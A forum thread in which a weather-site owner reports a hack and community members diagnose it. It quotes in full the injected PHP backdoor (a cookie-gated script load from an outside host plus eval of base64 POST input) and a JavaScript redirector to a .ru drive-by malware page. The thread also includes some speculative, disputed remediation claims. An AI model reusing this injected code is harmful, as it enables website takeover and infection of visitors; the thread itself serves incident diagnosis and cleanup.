Re-direction Problem

[tstorm]

Today I noticed that if a invalid script is request (i.e. http://www.harpersferry-weather.com/jfk.php) a user is directed to floatanswer[dot]ru/access/index.php . Before today if there's was an invalid script request a user was redirect towards a 404 image.   Help!

I'm thinking that someone hacked into the server  for my files as I have noticed that alot of files (wx file, index files) where changed this morning at exactly the same time.  On the 1st line the following was added on the after <?php :

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


Thanks,

John

.ru link disabled - Niko

[saratogaWX]

Oooh... nasty issue.  Some external entity has likely written an entry in your .htaccess file causing the redirect, and any time you get a redirect to a .ru (Russia) URL, it's likely to be a source of malware.  Using NoScript to block the execution of the redirect (but enable viewing of the contents), the page it goes to contains

Code: [Select]

<html>
<head>
<script LANGUAGE="JavaScript" type="text/javascript">

function readCookie(name) {
var xname = name + "="
var xlen = xname.length
var clen = document.cookie.length
var i = 0
while(i < clen){
       var j = i + xlen
       if (document.cookie.substring(i, j) == xname)
return getCookieVal(j)
       i = document.cookie.indexOf(" ",1) + 1
       if (i == 0)  break
}
return null
}

function getCookieVal(n){
var endstr = document.cookie.indexOf(";", n)
if (endstr == -1)
endstr = document.cookie.length
return unescape(document.cookie.substring(n, endstr))
}

function writeCookie(name, value, expires, path, domain, secure) {
document.cookie =
name +"=" + escape(value) +
((expires) ? "; expires="  + expires.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "")
}

writeCookie('d4c734f0a93e4f8dd06e5b2746','d5317e373e86ae1ab4ce9c22726');
if ( readCookie('d4c734f0a93e4f8dd06e5b2746') == 'd5317e373e86ae1ab4ce9c22726')
document.location.href='http://footerleftonmouseover.ru/main.php?page=b67137fa79c9e463';
else
document.location.href='http://www.bing.com/search?q=404+error&form=MSNH14&qs=n&sk=&qs=AS&sk=&pq=404+error&sp=1&sc=8-9';
</script>
</head>
</html> which appears to be a front-end for a drive-by malware JavaScript downloader which will automatically activate if JavaScript is allowed on that site.  Bad news for any unprotected browsers.

Check your .htaccess file now, and if nothing appears in there to redirect 404s to the floatanswer.ru domain, then contact your webhoster and say there's likely a webserver compromise and have them check the master Apache config files.

[saratogaWX]

John..  send me a direct email (webmaster at saratoga-weather.org) and I'll send you a PHP script that can be used to detect a malware infection on your site.

[saratogaWX]

And Yes, the added PHP lines you added to the first post are a dead-givaway that someone has hacked the site (and maybe not just your site on a shared webserver).  Time to do a cleanup and make sure the tech support for your webserver is aware of the issue so they can check the logs to see who got in and via what means.

[niko]

John, I edited your post to disable the link. Best not to have folks clicking on that.

[MesquiteWx]

This isn't a server issue this is the google redirect malware attack that Firefox users are encountering.

I see you're on server 08 R2 are you using domain profiles?

[saratogaWX]

It was both a malicious modification of all his PHP files (to include the code snippet he showed above), and a general hack to have the 404-error processing HTML page do the script to refer to the malware drive-by site (code shown above).

John let me know his hoster has restored most (but not all) his files from a prior backup, and he's working to reconstruct his site.  Awful way to greet the new year.  No clues on how they 'got in' to do the mischief as of now.

[MesquiteWx]

That's all great, he is able to to restore his files only for it to happen again because it is using ADUC as a backdoor to his web host while browsing as it attaches itself to the profile on his domain. You can restore your files all day long. But, you need to stop the source of the initial ejection or it will happen again. In order to do that you need to back up your profile then delete it and then log in and recreate it. But before you do that make sure you have a admin account with local access. Otherwise you won't be able to log in and recreate it.

[saratogaWX]

That's all great, he is able to to restore his files only for it to happen again because it is using ADUC as a backdoor to his web host while browsing as it attaches itself to the profile on his domain. You can restore your files all day long. But, you need to stop the source of the initial ejection or it will happen again. In order to do that you need to back up your profile then delete it and then log in and recreate it. But before you do that make sure you have a admin account with local access. Otherwise you won't be able to log in and recreate it.

I'm curious about what leads you to assert that "it is using ADUC as a backdoor to his webhost".
The HTTP headers indicate an Apache webserver is used with no hint of OS.  I thought ADUC (Active Directory Users and Computers) was a Microsoft Windows thing, and it's quite possible his webserver is Linux (or variant).
Would you mind elaborating on your thiking that lead you to the ADUC conclusion?

Best regards,
Ken

[MesquiteWx]

According to his details he uses Windows 7/Server 2008 R2 as the OS he currently uses that he is browsing on. Yes you're right it has no association to his web server. BUT, Something had to infiltrate his web server though and normally it is through log in. Since he is on server 08 RC2 I am assuming he is on a DC with a local domain which means if that's the case he has a domain profile not a local machine profile. The ntuser.dat file stores all the credentials and then some in the HKEY_CURRENT_USER hive for the registry. So initially if his machine was infected and when he logged into his web host he now just gave access to his web host as it stores those credentials in a host file from the infection. You can check the host file to see if it's been modified by Clicking Start, click Run, type %systemroot% \system32\drivers\etc then look for the host file. Luckily though if he does log into a domain then he can back up his profile then delete it, login and it will recreate a new one. But he would need to be logged in as a local admin on the machine, not his profile even though it may have local admin access. Then transfer everything back over except for your local settings and application settings.

I deal with this exact problem at least twice a week since Aug in one of my clients environments. Which when the agents login to the domain it runs login scripts from their web server for their agent login, time clock, etc for various tasks. which is set in their host file. Don't ask me why, I told them that was not very good since now it bypasses the security appliance.
 

[niko]

"Windows 7/Server 2008 R2" doesn't necessarily mean he's running server 08 RC2. The OS ID isn't that smart, see mine, I'm posting this from plain old W7/32.

[MesquiteWx]

You're right that may be the case. That is why I asked earlier if that was the case, because if it is then he would need to get to the root of the infection and how his web host was infected. Luckily if he is on a local domain and his profile is infected it can be easily removed. If not, then you have a quite the task ahead of you if his PC is infected.

[niko]

There's also a trojan that will grab the login from FileZilla if he uses that, and possible vulnerabilities in scripts from unknown sources, and, and, too many different possible vectors unfortunately

[saratogaWX]

I've been analyzing John's apache logs, and it looks like the malicious activity was the result of a PHP shell script injected into his site and remotely operated via POST to his website.  Now looking back to see what was used to get the shell script there in the first place.  This is the similar avenue I've found with other sites I've helped debug/disinfect in the past .. a vulnerability in one script is used to download a powerful remote-shell PHP script which is then used to do the mischief on the site.  No ADUC or user credentials compromise needed .. only a vulnerable (read poorly secured) script is needed as the starting point for this attack to succed.  Moral:  keep the software on your site up-to-date, particularly any software that allows user uploads to your site (like photo galleries, in-place editors, etc.)

Best regards,
Ken